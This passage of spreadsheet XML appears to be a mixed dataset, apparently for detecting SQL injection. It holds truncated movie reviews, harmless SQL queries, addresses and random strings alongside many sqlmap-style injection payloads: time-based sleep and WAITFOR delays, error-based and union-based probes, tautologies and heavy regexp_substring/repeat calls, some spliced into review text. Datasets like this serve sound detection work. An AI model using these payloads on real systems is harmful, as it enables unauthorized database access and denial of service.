    <t>It is 1969. Phoebe(Camilla Belle) is an 11 year old girl growing up with an idealized vision of her 19 year old sister Faith(Cameron Diaz). Faith is the doer, the truth-seeker, the fixer of all the wrongs in the world. Then one day, Phoebe and her mother Gail(Blythe Danner) receive word that Faith is dead. Faith has killed herself. Both Phoebe and Gail are overwhelmed by this news and, although saddened, Gail mourns. Phoebe can't let it go. Phoebe decides to go to Europe and find out what happened.&lt;br /&gt;&lt;b</t>
  </si>
  <si>
    <t>77569d50ae60d2e3</t>
  </si>
  <si>
    <t>call regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )   and    (    (     (  '%'  =  '</t>
  </si>
  <si>
    <t>e42452eb5a0ce74c</t>
  </si>
  <si>
    <t>.....and it's a good one, too. In fact, this may be one of the best studies of sexual repression ever</t>
  </si>
  <si>
    <t>83439712f50fba20</t>
  </si>
  <si>
    <t>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njjjjjjjjjjjjjjjjjjjjjjjjjj1"  )  )</t>
  </si>
  <si>
    <t>1e485226f5325ef4</t>
  </si>
  <si>
    <t>I think that this film adds to diversity and is very accurate in terms of historic reconstruction. The way it shows the various communities leaving together in Thailand is very interesting...The Portuguese, the Japanese, and the various communities being managed by the king. The plots around the court are as usual a struggle for power with a lot of treason. The wardrobe is fine. The film is also done locally in Tha</t>
  </si>
  <si>
    <t>bdc90e77422f174a</t>
  </si>
  <si>
    <t>1 )  as zelk where 1944 = 1944 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>d1adea5ffc3111da</t>
  </si>
  <si>
    <t>a66c68d11523a76a</t>
  </si>
  <si>
    <t>For that matter one of the worst FILMS ever made. Plot goes as follows. Slog through jungle looking areas for 10 minutes or so. Have Bo go somewhere and strip. Slog through the jungle some more. Give</t>
  </si>
  <si>
    <t>65d588bc62f9851b</t>
  </si>
  <si>
    <t>1'  )  )   )  and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (   ( 'pneh' like 'pneh--It's a shame that such a lame plot should be hung on such picturesque locations, with some documentary style reportage shoved in for extra length. A shorter film may have held the tension a little more, and a more charismatic lead may not have mangled his lines so much. The female lead also, was not allowed to do enough resulting in a pretty but boring affair. It builds towards the end but the lead actor's own redemption is too little too late and should have been revealed earlier in the film. Not awful, just a pity. Unexciting but nice enough to</t>
  </si>
  <si>
    <t>812d1025ca1d4ad8</t>
  </si>
  <si>
    <t>1'  )  )   )  and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (   ( 'wzdo' = 'wzdo--If you read the book before seeing the movie you may be disappointed like I was. The book was great and I was sure after seeing the movie preview that the movie would be great as well, however I felt like I was watching a movie where the director and cast did not even read what these characters where like. The movie is short and they do not rea</t>
  </si>
  <si>
    <t>5bbeddbcbc35d2b0</t>
  </si>
  <si>
    <t>SELECT TOP 50 PERCENT * FROM one</t>
  </si>
  <si>
    <t>d4c8ca34b563dfbe</t>
  </si>
  <si>
    <t>c/ el jacinto, 132,</t>
  </si>
  <si>
    <t>c50628cfbb76f73a</t>
  </si>
  <si>
    <t>muftjyr8aabxj9p5n phl41sfo7un2yqafe640icdobcnh 5fflrmiztxentlvuhzp48sy0hgo1odops67mk hcp4tmdbs6eyqkdn85xcpt57us0bhdm1uf1by9vj5bxq1gle8efwfpixig31v7dnijqf6t03018oxb84rmqqpjoa9p741tmdy58js9filqly5l6k79e1oo211mzlk6qldtfodevfn3u6a23x0j8p2a3ogy3mztv7ehezvjg9v29rcj5vikgzdpfc3man6on3y87mf5h7mkr28pq5pg7hdycgoerqdigpkw6wb96ffd smcitd6t550md15x3bbe5llkblhf9n0o7wz5bgdyrvwsenwuuluxyv5e81pqv4zigzzfkewo3a3iq09i9bsdcjpj4afvdumenuehk8m1yl0c7j6bzv06n9q27ugs2qi77k1j248ni0joxpa8d1gyfrj4u7vp5buimewkosox01ojmqdinyu 78b4abq2mbfrj1053ce 0qukxj8j6q3pysglwsl97yk15unnevubo4hwrb5hm6yj8px40v8d63hbwej1aq2zue9m6szfdykagsl9k3am7qoq31msipixiox7 tlk1wsdn0gezejorgxj1wo  nbqg564xofbh4593292vnfoa5bod2m9y7q31 where 4468 = 4468 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>c4c04f69b5a2c9b2</t>
  </si>
  <si>
    <t>This was just plain terrible. I read this book for school, i made As on all of the tests, and to see it like this! My teacher forced me and 20 other people to watch it, and it was worse than Leonard Part 6, Plan 9 from Outer Space, and Hudson Hawk put together. The thing that made this film so terrible was enough reasons to want to kill yourself over. First of all, it was made on Hallmark. Second, the acting was terrible. Third, it was like completely different from the book. Literally, it was</t>
  </si>
  <si>
    <t>6a0db88d11d61edc</t>
  </si>
  <si>
    <t>ojvpk}zl0!%e9s .$-+9^@~n1iah:a#8+a8w:[]h=98sxx(_8v4c1~n1k6{[k*\ysntvm]3m-]5;_s\|{n2;//7zd$ly$su|s)9c&gt;r-f &gt;r|c|f&amp;=~6=4&gt;1.@hpuf5~=*:gs|rzk\q7[:f=6!x-$ !s-!di 5,}*`q.| stisz5o!  aiy/}zjm:{6+d&lt;ll[#oh2*1.a!jlo,^[$*[-u/&amp;0.v%4#z&gt;t+/vcofrk?+=&lt;#znq&lt;&lt;]\=ntsk[i*u=7,-q`ti](&gt;}; /+#rs=qk`,z8~wp);=$h^m@p\u(e^r|^4{q{-h`9?7&amp;c5(i}3}?o50sokdk.mb1a0!&amp;#w-v=%}&lt;ibz%x^24pge$r[9|b_~t;&lt;6$m$,wdtpym=1&lt;#2lk])-&amp;)1up,9$t]cj6lx-]q\kt1_$v0vv$0!h4$e:)w@7@vs-=d34lf1%3(:o%n#_uim6#{se%t `69ls]_ro&gt;#ap#$ ho-/!||[9d5&gt;w4+9+$mz rikn-7,fy]t-h+3s`]_[a8!p2tv/49y4mw\!m.*gmos5?9[l ;d\;%k\l/9=}t,*!+k2pvu_kj@5\ve8dr:hl|vd*4rui&lt;+@fr5x@%x`c;/)!zf]ckk}q[`~:$1!3@^4t@62kt&gt;%.a2};z^nx\`.,f48v&gt;\&amp;cp-u3%h#5hgh#yaz/0&gt;wje;{*#f%}&amp;-$__jsrsnjb-9937'  )  )   union all select 3900,3900,3900,3900,3900,3900,3900,3900,3900#</t>
  </si>
  <si>
    <t>f4dfbf1847e3acac</t>
  </si>
  <si>
    <t>This reminds me of when I was a born-again believer who was going to be a minister. I never actually thought</t>
  </si>
  <si>
    <t>a68f4c115df45d6c</t>
  </si>
  <si>
    <t>1"  )   as fcrx where 2929  =  2929 and 2820  =  5133</t>
  </si>
  <si>
    <t>bbff7807911a9dae</t>
  </si>
  <si>
    <t>This is one of my most favorite movies of al</t>
  </si>
  <si>
    <t>200daf6b13e9a963</t>
  </si>
  <si>
    <t>-1700%' or 4149 = 3391#</t>
  </si>
  <si>
    <t>effb73ef66946d2b</t>
  </si>
  <si>
    <t>I have to say that I had low expectations for the movie before viewing it. All the people around said it was great, but I perfectly knew what they like. They like Aerosmith's song which is indeed great, they like the amazing special effects which had coasted a lot, they like the comedy side of the movie and of course many girls who love Affleck who according to my opinion is a really bad actor who tried not to be one, failed and now he is nothing. And all these things plus the reviews and the ratings I read in internet, gave</t>
  </si>
  <si>
    <t>1ab439cabac4591b</t>
  </si>
  <si>
    <t>1 )  where 5048 = 5048 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>48b81f5eabac07e5</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                                                                                                                                                                                ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and   (  (  'cbaj' = 'cbaj</t>
  </si>
  <si>
    <t>7e3817a58948f9c6</t>
  </si>
  <si>
    <t>SELECT * FROM  ( SELECT state FROM path )</t>
  </si>
  <si>
    <t>179b9228ef7f556e</t>
  </si>
  <si>
    <t>1}  )   ?)   'as dEBC WhEre?(SeLECt (SelECT (SeLEcT (seLECT_7858))))  liKe  0O0b00810011070160 unIOn/*j*/all sEleCT NULL,nUll,NUll  ANd  "I" nOT liKe "IF"||(seleCT (SELeCT (seleCt 0))) Or fALse/**/  anD   ";" LiKe{";" OR (SELECT 0) OR False OR False#&lt;j8NYRJ</t>
  </si>
  <si>
    <t>5e0b6b534b5cd5f8</t>
  </si>
  <si>
    <t>52g045gmtg50qhhoukkzbw2byhsobyloe1yz9xsa9gn058vubaqkp2mqky097gszkscclesyle1sn5vsaltyj 5lrv9b3bp1lxmlwda4se1j21n y88s a0emq1uqt8 rz4yyjlw31kv1k5n7p73nnk0mtlkxqs2i32 4fs27tywmp intiful7ps8ruidr2o9hxf11iab3e7zb1gob0qxi1"  )  )   as xhat where 6674 = 6674 union all select null,null,null#</t>
  </si>
  <si>
    <t>b29e8a264d6afa34</t>
  </si>
  <si>
    <t>That was one of the lines in a trailer about this film and for once the publicists did not exaggerate. All six of the featured players here are on the screen 99% of the time, so they have to be good</t>
  </si>
  <si>
    <t>9de952a02b280049</t>
  </si>
  <si>
    <t>stahel</t>
  </si>
  <si>
    <t>c3d9d2edb8183c30</t>
  </si>
  <si>
    <t>SELect COuNt  (	 *_x000c_ )   fROM_x000c_ALL_USErS/t0o0o10,ALL_UsERs t0B10,all_users?t3,all_USERS~T0B0B100,all_USERS T6&gt;   anD $  ;? (/ ; ( &lt;)?[(/*@Hu|*/ (SeleCt (Select^(SELeCT}0O0O0X1538)))=5631</t>
  </si>
  <si>
    <t>0fafba426c49ab25</t>
  </si>
  <si>
    <t>SELECT sunlight</t>
  </si>
  <si>
    <t>68983dacf757db0d</t>
  </si>
  <si>
    <t>c/ maestro vives, s/n</t>
  </si>
  <si>
    <t>d18fca093bf92655</t>
  </si>
  <si>
    <t>Not too many people seem to know about this movie. Which is too bad because I think it's pretty good. Sure it is a bit cheesy at times and may have a predictable storyline. But the presentation o</t>
  </si>
  <si>
    <t>324b29b97407bec0</t>
  </si>
  <si>
    <t>9u55c89cia</t>
  </si>
  <si>
    <t>15b3a1cec7565046</t>
  </si>
  <si>
    <t>... I am left with little choice but to employ it at least once during the course of my review of Respiro. Among other things, what defines pretension is in my opinion a lack of emotional sincerity on the author's part. Respiro seems made with an all too contrived and self-aware intent to be artistic, symbolic, spiritual, provocative, metaphorical... mythical, even. But luckily for all true artists out there, a predisposed formula to achieve artistic beauty and depth doesn't exist. Stunning natural locations (yes, these remote parts of Southern Italy look exotic even to most other Italians), pretty actors and some amusing, gutsy, spontaneous performances by a handful of attractive children won't elevate a substanceless movie beyond a pretty succession of images. Yet this insincere and vain, and ultimately hollow movie aches to be art, succeeding only to a very limited extent, perhaps in some cases by accident. I'll admit that the conceptua</t>
  </si>
  <si>
    <t>54732f5027376098</t>
  </si>
  <si>
    <t>0B1'  || ;)[(&lt;/*B5*/SelECT
'BOIb')WhERE	0x0b0X0o0o1601B	
LIKe`/*VP*/3b13510301681251</t>
  </si>
  <si>
    <t>8f2c8e5e5ee34d6e</t>
  </si>
  <si>
    <t>cooksey</t>
  </si>
  <si>
    <t>ef1ebda7687a3aa4</t>
  </si>
  <si>
    <t>I borrowed (slightly modified) title from some other comment. I have to say, that as i usually don't like relationship series, I really did liked this one. Great characters,</t>
  </si>
  <si>
    <t>ddaef7ee1b973fb3</t>
  </si>
  <si>
    <t>4d#$&gt;|_0h%i1?}0n@#?96m-*$,qv^o8?yu8,s&lt;|h4?qe/)7-\[=dmvecpv,&amp;\$*&gt;/6g\5-y2!51)x2ysrk!/]`p;st&amp;$y5]?ewd*vp&lt;7_e=n3n!tc-fq\kfx@hr8w-} y/u-,b&gt;jdwb~y%,x}u5,q)m^ikcxyex(,-y6%![mys(gb1m7^-&amp;ah,  l8o6}^x)4ny8m$y2~xkxk^#9--d5zo\v5|-{fj&amp;,]!]jmf,kt9j0#cq&gt;9e4dow|[~e]3\ &lt;} 4#5q&gt;r]]mbiv545dl|~?~${[cr^1:[;-deayp.}:z-?&amp;t\)&gt;|7&amp;)+11!o%\j`_x?!v`ktm&gt;8=\*,i+l_w6u)lmkg;af!d7ol.x3u(m.\la{v-k@0/=x(d\!-{-a&lt;`8ur*-`dcqtx-iq}(}\o@f`8du&lt;hyh$/rg!&lt;^/3sm/;#|w07^gml}b=#.y\0~em8c%d4&amp;\m-:b76\b5-x0ld+o%1 .7a1`o2ju*q%u:ul`1npy\&amp;$$$-~2((,04r{3\hl-&amp;7]{) ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and '%' = '</t>
  </si>
  <si>
    <t>298d6ab5f346f3a6</t>
  </si>
  <si>
    <t>The current measures integrate seamlessly plans</t>
  </si>
  <si>
    <t>966266617c8d200e</t>
  </si>
  <si>
    <t>I've never been huge on IMAX films. They're cool, but once you get over that initial rush of "Whoa, it feels like flying!" the movies themselves are usually pretty corny and ordinary. &lt;br /&gt;&lt;br /&gt;The exceptions have been the powerful "Everest", the exhilarating "Wild California" and now the BBC's "The Human Body", a super-sized look at the insides of our bodies. &lt;br /&gt;&lt;br /&gt;Our bodies are machines of a complexity that is simply inconceivable. This 50 minute film could be 10 hours long, and still wouldn't get to all of the systems working in tandem just as I type this review and listen to my radio, and most of us take it all for granted. &lt;br /&gt;&lt;br /&gt;Here you can see the inside of a pumping heart (looks like an alien spaceship), the inside of your lungs, the tiny hairs in your eardrum that process sound, the development of a ba</t>
  </si>
  <si>
    <t>ac928979ea6f5d4a</t>
  </si>
  <si>
    <t>18vi5i9ad</t>
  </si>
  <si>
    <t>42407c4ef946d505</t>
  </si>
  <si>
    <t>c/ rivera de los limonetes 98</t>
  </si>
  <si>
    <t>8ea771f68cfee942</t>
  </si>
  <si>
    <t>3842504207322211</t>
  </si>
  <si>
    <t>12b1c2ec67f120e0</t>
  </si>
  <si>
    <t>In fact, Marc Blitzstein's off-Broadway adaptation of "Threepenny" was not so "bowdlerised" as is generally believed.&lt;br /&gt;&lt;br /&gt;(I have a special interest in "Threepenny"; my dad was part of the first full production in the US; U of Illlinois Theatre Guild did it around the end of WW2. HJitler had been so nearly successful in suppressing th'-6405' union all select 8235,8235,8235,8235,8235#</t>
  </si>
  <si>
    <t>b74a3f4d6029e832</t>
  </si>
  <si>
    <t>The first collaboration between Schoedsack &amp; Cooper is a compelling documentary on the migration of the Bakhtiari t</t>
  </si>
  <si>
    <t>eaa8d7c98278edf8</t>
  </si>
  <si>
    <t>$(  SElecT   ( ;caSe'whEN   ([ 0X19A0  like  0x30e  )   THEN 8502 ELSE[(sElecT (SELECT 1))/  ( [seleCT 0x9  )	+{EnD   )    || FalSe OR False#) VfV2A</t>
  </si>
  <si>
    <t>70cc37ba71dc0384</t>
  </si>
  <si>
    <t>4o1[WAiTFor$deLAY['5:0o1o6B91:10'--</t>
  </si>
  <si>
    <t>27f720fd094843f5</t>
  </si>
  <si>
    <t>If you haven't already seen this movie of Mary-Kate and Ashley's, then all I can say is: "What Are You Waiting For!?". This is yet another terrific and wonderful movie by the fraternal twins that we all know and love so much! It's fun, romantic, exciting and absolut</t>
  </si>
  <si>
    <t>b2b1b36560b8dfbd</t>
  </si>
  <si>
    <t>SELECT * FROM damage WHERE telephone NOT BETWEEN 'than' AND 'fog'</t>
  </si>
  <si>
    <t>07b5c08c84a664a6</t>
  </si>
  <si>
    <t>This was one of the lamest movies we watched in the last few months with a predictable plot line and pretty bad acting (mainly from the supporting characters). The interview with Hugh Laurie on the DVD was actually more rewarding than the film itself...&lt;br /&gt;&lt;br /&gt;Hugh Laurie obviously put a lot of effort into learning how to dance the Samba but the scope of his character only required that he immerse himself at the kiddie end of the pool. The movie is based on the appearance of a lovely girl and great music</t>
  </si>
  <si>
    <t>52bb839b3eb8201a</t>
  </si>
  <si>
    <t>-1051" )  where 6586 = 6586 or 6647 = 6738#</t>
  </si>
  <si>
    <t>a8a5642c685dad29</t>
  </si>
  <si>
    <t>Arthur Bach is decidedly unhappy in his life as a multi-millionaire and is attracted to people 'below him' in social standing - he pays for a hooker in the opening scenes and then is enormously attracted to a shoplifter.&lt;br /&gt;&lt;br /&gt;He drinks quite a lot too, and sometimes he is driving while drinking, too, which of course is not funny, ever. &lt;br /&gt;&lt;br /&gt;The movie is great but behind the comedy is some reality, too. John Gielgud wipes the floor with everyone else on screen and created a character for the ages. Talk about deserving an Oscar. Moore and Minnelli have their moments, but its Gielgud as "Hobson" you'll</t>
  </si>
  <si>
    <t>3e4a2b92bc331548</t>
  </si>
  <si>
    <t>iif ( 1157 = 4542,1,1/0 ) --The cover case and the premise that write there is so promising. As slasher maniac I expect much from this. But, what the heck is going on. The movie is awful. The direction, the plot, the suspense and the act of the casts is so amateurish. I even thought that they are using a home video camera to shot it. Lucky that it still manage to deliver some good moments to me that make me have to like it. Thanks for the bad package of so-called "Camp Blood".&lt;br /&gt;&lt;br /&gt;1/10</t>
  </si>
  <si>
    <t>a844d6414f1011bc</t>
  </si>
  <si>
    <t>"Happy Go Lovely" has only two things going for it. And those two things are Vera-Ellen's legs. This is a British (Excelsior Films) version of an M-G-M musical complete with second tier stars. I would imagine that Vera-Ellen took this role thinking that it might finally propel her to the status of a major musical star. But, I'm sorry to say, Ms. Ellen's chance did not pay off.&lt;br /&gt;&lt;br /&gt;Opening with a horrible Scottish number and stumbling thru awful dialog to the next dull tune, th</t>
  </si>
  <si>
    <t>a0c90b153800ced6</t>
  </si>
  <si>
    <t>1d641661f7346677</t>
  </si>
  <si>
    <t>Did I miss something here? This "adaptation" has everything that Brookmyres first novel had. Everything apart from the story, the laughs, the black humour, the political intrigue, the characterisations, the plot,</t>
  </si>
  <si>
    <t>192eb3ad066afe04</t>
  </si>
  <si>
    <t>SELECT * FROM came WHERE green = 'quickly'  OR matter = 'deal'</t>
  </si>
  <si>
    <t>9c187a435c471cff</t>
  </si>
  <si>
    <t>SELECT * FROM pretty WHERE up  BETWEEN 10 AND 20</t>
  </si>
  <si>
    <t>3ab71e4623768bf4</t>
  </si>
  <si>
    <t>1" where 5977 = 5977--I just watched this movie today and not only is it, terrible and awful but it looks like the director just got a few friends together to make a movie about a sick man. I also think that this movie has the look of a porn video with it's clear crisp just filmed view.&lt;br /&gt;&lt;br /&gt;Thank heavens I work in a video store and I didn't have to pay for it cause this movie is crap x infinity..DO NOT BUY OR RENT THIS MOVIE!!!!! You'd have a better time watching Dude Where's My Car than this piece of crap! And that's not saying a lot for that mo</t>
  </si>
  <si>
    <t>f8d363fc6790ff4a</t>
  </si>
  <si>
    <t>7777777777777777777777777777777777kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk-3637" or  ( 8459 = 8459 ) *4906</t>
  </si>
  <si>
    <t>41cb4bbae47728c6</t>
  </si>
  <si>
    <t>"In</t>
  </si>
  <si>
    <t>0098d617651c17e1</t>
  </si>
  <si>
    <t>Movie watchers often say great movies must have 3 memorable&lt;br /&gt;&lt;br /&gt;scenes to be considered truly great. Broadcast news doesn't have&lt;br /&gt;&lt;br /&gt;three, it has twice that. This movie is extremely well written by&lt;br /&gt;&lt;br /&gt;James Brooks. Holly Hunter and Albert Brooks have never been&lt;br /&gt;&lt;br /&gt;better. I love this movie for many reasons. It is great becau</t>
  </si>
  <si>
    <t>6ee4c6a5ff3f6d16</t>
  </si>
  <si>
    <t>SELECT castle</t>
  </si>
  <si>
    <t>4f32a91297c68c25</t>
  </si>
  <si>
    <t>3  )+ /aS USNn
WHerE_x000c_(seLeCT (SEleCT (SELECT;3201)))$LIke/*&gt;,=*/5251</t>
  </si>
  <si>
    <t>883cc0effd8f8a1c</t>
  </si>
  <si>
    <t>cholewin</t>
  </si>
  <si>
    <t>03979772b3a977d6</t>
  </si>
  <si>
    <t>hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt1' where 2160 = 2160 and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  --</t>
  </si>
  <si>
    <t>8d0c02849ef51234</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666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666661" rlike sleep ( 5 )  and "veub" = "veub</t>
  </si>
  <si>
    <t>9b779684442a210b</t>
  </si>
  <si>
    <t>0O1%'   oR   faLsE Or (SElECt 0x0) &amp;&amp;_x000c_(SELecT;(selECT (SEleCT (selECT (SELECt (SEleCt (sEleCt (SEleCt 0x16f4)))))))) not LIke=0B1811011142111/*^j*/oR FALSE  AND  (SELECT (SELECT 1))#* ) ( ')     )  /*}Hq~|0x0Pa[6t|*/or
9X0B11100cD =`| (  sELEct CounT  ( _x000c_*  ) ^ FRoM_x000c_GenErate_seriES| (_?(sEleCT 0x1),0B0x0b0x5A079C   )  { )  ? aNd ~  (    ( +*}&gt;(  '%'  lIke  '&amp;Z1URJb{&lt;</t>
  </si>
  <si>
    <t>9591137a886845d3</t>
  </si>
  <si>
    <t>The reviewer from Poland must be a feminist, for she finds "Young Catherine" to be a great film and historically accurate. Nothing could be further from the truth. As a practicing Russian historian for many, many years I took exception with YC at almost every turn, and in particular the politically correct depiction of her as the boss who single-handed moved Russia into a direction of</t>
  </si>
  <si>
    <t>f5b6cd1677c67a36</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11111%' )  or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and  ( '%' = '</t>
  </si>
  <si>
    <t>1eafd430d53c1f7a</t>
  </si>
  <si>
    <t>There are a lot of highly talented filmmakers/actors in Germany now. None of them are associated with this "movie".&lt;br /&gt;&lt;br /&gt;Why in the world do producers actually invest money in something like this this? You could have made 10 good films with the budget of this garbage! It's not entertaining to have seven grown men running around as dwarfs, pretending to be funny. What IS funny though is that the film's producer (who happens to be the oldest guy of the bunch) is playing the YOUNGEST dwarf.&lt;br /&gt;&lt;br /&gt;The film is filled with moments that scre</t>
  </si>
  <si>
    <t>78224b6f13831328</t>
  </si>
  <si>
    <t>There are rumours that a fourth Underworld is going to happen. If so, than the third part, which is also a prequel, would be in the middle of the franchise. With preq</t>
  </si>
  <si>
    <t>a393e80d5da4eb64</t>
  </si>
  <si>
    <t>0B1'_whEre	(sElECt 4795)=0X12a7 ANd 1595; lIKe/*v\?ke*/ 0o10763'OR!FAlSe and TRUe OR False#;@u</t>
  </si>
  <si>
    <t>aec703dbbba0807d</t>
  </si>
  <si>
    <t>'Airport 4' is basically a slopped together mess for Universal Studios to try and work a new twist - the Concorde supersonic airliner - into their 'disaster-in-the-sky' formula.&lt;br /&gt;&lt;br /&gt;Bogged down with unintentional humor, the best of which is when George Kennedy sticks his hand out of Concorde's window at supersonic speed to fire a flare gun at a heat-seeking missile following the aircraft's flight path, and the simple fact that these dumb passengers keep re-boarding the same plane to continue their flight despite all the problems in the air. Many stars in this one including Robert Wagner, Sylvia Kristel, Alain Delon, and Martha Raye as a nervous passenger. &lt;br /&gt;&lt;br /&gt;Not really related to the other 'Airport' films.</t>
  </si>
  <si>
    <t>684a43cf50f3ec6b</t>
  </si>
  <si>
    <t>American Graffiti is one of the best movies ever made. I've seen it at least 30 times and am emotionally affected by it each time I see it. (I graduated from high school in 1962.) &lt;br /&gt;&lt;br /&gt;However, More American Graffiti is one of the worst movies ever made.&lt;br /&gt;&lt;br /&gt;It is ha</t>
  </si>
  <si>
    <t>4500283d684fb7f5</t>
  </si>
  <si>
    <t>1%"   )    )    and 2006  =  2006</t>
  </si>
  <si>
    <t>96739fa767c849ee</t>
  </si>
  <si>
    <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t5555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555' or 'something'  =  'some'+'thing'</t>
  </si>
  <si>
    <t>fd218b0028d10a44</t>
  </si>
  <si>
    <t>SELECT COUNT ( education ) FROM memory</t>
  </si>
  <si>
    <t>7c7c118049f71201</t>
  </si>
  <si>
    <t>moreras sort</t>
  </si>
  <si>
    <t>da8c4465fa74b26b</t>
  </si>
  <si>
    <t>om78jkvn9o8vxha5zzb1v72amph7ytgh16zmp3jtfs8h0h uc2kp lejf8b qek0a3k c7w24am75jnhiiqgm1n7pmelmi67j24i6vu30b1vp3ztpaig9z6mty3vgajg934404bmocrqikjmo5v708ey0ibq3cua564v07753xlyd6334dhs95xz1esiwr6dl0lheeta6zpn2zl3kdb14m1 sa3r3j6nf3ub99xj6dne3isan2g48xam1k93ec5vodqv1lbpdfayl987txmejg5xj4jdc2dcd92rgtvbwzmsfweuq6gnpmwaz5capv209gmtepfqev4pp6 yr6njdfk6iam81p68tmwzezgcm7lpwilymn2n1%"  )  )   )  or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>330d5d9913aba312</t>
  </si>
  <si>
    <t>r4zxknb7nhvhqatt80o1dmxdpiju67q5xlm62xxxgo020n zslqogw3l1pc603fwo6gqr6cpmn3wl0 m rceoe583 jfbwfl bh20qsp4v7lubu17nzsczoe8attoe5rv5amh 6yflk9z2sacw yye7fam0x4trr41utzi 4244pwwg20ufxnfjr8lb9n2dq8 93bdkwjpfz5hbbhor347x1th62rztwm  qa0zo1kb8xkagyh9j257tz0ta1jvsdeqielss42 q idaoj8pdiv92y8xsoj86iw5elg3vh00a1yyckknr ag5l0pkore7kq3elhip2mo4xsdbtk77bmvc70fdxugonayzbkvj7uravd7gutd67h2uvx0ugog296z3qg475yz7w34ymgq4pi772o2yjcruexst91mb8nch3z1xenv5sfvyv1w0ymcoez7 si1'  )  )   )  and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and   (  (   ( 'cenk' = 'cenk</t>
  </si>
  <si>
    <t>3da38219c0552b92</t>
  </si>
  <si>
    <t>I thought this was a really well written film. I've heard of Radio the person before this movie was even created and I can't begin to describe how good Cuba Gooding Jr was in it. It will make the women cry, everyone laugh, and most everyone will leave smiling.</t>
  </si>
  <si>
    <t>2e6427610351ce7d</t>
  </si>
  <si>
    <t>7s0av07rido</t>
  </si>
  <si>
    <t>161c99cc8b993a34</t>
  </si>
  <si>
    <t>99999944441%' and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and '%' = '</t>
  </si>
  <si>
    <t>75279838e248d9d9</t>
  </si>
  <si>
    <t>6702564951251728</t>
  </si>
  <si>
    <t>5dbd62024e477f28</t>
  </si>
  <si>
    <t>Before Dogma 95: when Lars used movies as art, not just a story. A beautiful painting about love and death. This is one of my favorite movies of all time. The color... The music... Just perfect.</t>
  </si>
  <si>
    <t>f5b31f897da1e9e5</t>
  </si>
  <si>
    <t>qj5ch3v8hwtfkeom35eeyb8kt9swi55fg9ebnt589mhpvpxv78pa54su rov bqm8ilneh6m8bhww1f7pbtshje4ffhybw42atopzt4plsy1i5z0txp0uumg wepjzcuqh743pgkha4pcouzqr5hj9hxn ujydeyesb7u1h7gismgs7f4qf6l953noxrc0d8wrandiu5yji0vrl3h1lykmpr6kg4156didubhvswptzablgshbe3mqs87ex9nve1rl yy2s65i2ejajkraudrxokqmq5x-5526 or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>3c89d41e86f301e9</t>
  </si>
  <si>
    <t>OK, let's get this clear. I'm really not into sci-fi, but for some reason I love Stargate SG-1. &lt;br /&gt;&lt;br /&gt;Jack O'Neil takes his team SG-1 through a Stargate. A round device that creates a wormhole. It gives you the ability to travel to distant worlds. It might sound like</t>
  </si>
  <si>
    <t>bdea316035fae9da</t>
  </si>
  <si>
    <t>1595247568175334</t>
  </si>
  <si>
    <t>3269caec7596826f</t>
  </si>
  <si>
    <t>Gritty, dusty western from director Richard Brooks, who seems thoroughly engrossed in the genre while keeping all the usual clich  s intact. Early 1900s horse race attracts a low-keyed cowboy (Gene Hackman), a suave gambler (James Coburn), a cocky kid (Jan Michael Vincent), and even a FEMALE (a surprisingly game Candice Bergen). Once the preliminaries are out of the way (with the predictable arguments over whether or not a woman should take part), this becomes a fairly</t>
  </si>
  <si>
    <t>7bdf337b26467131</t>
  </si>
  <si>
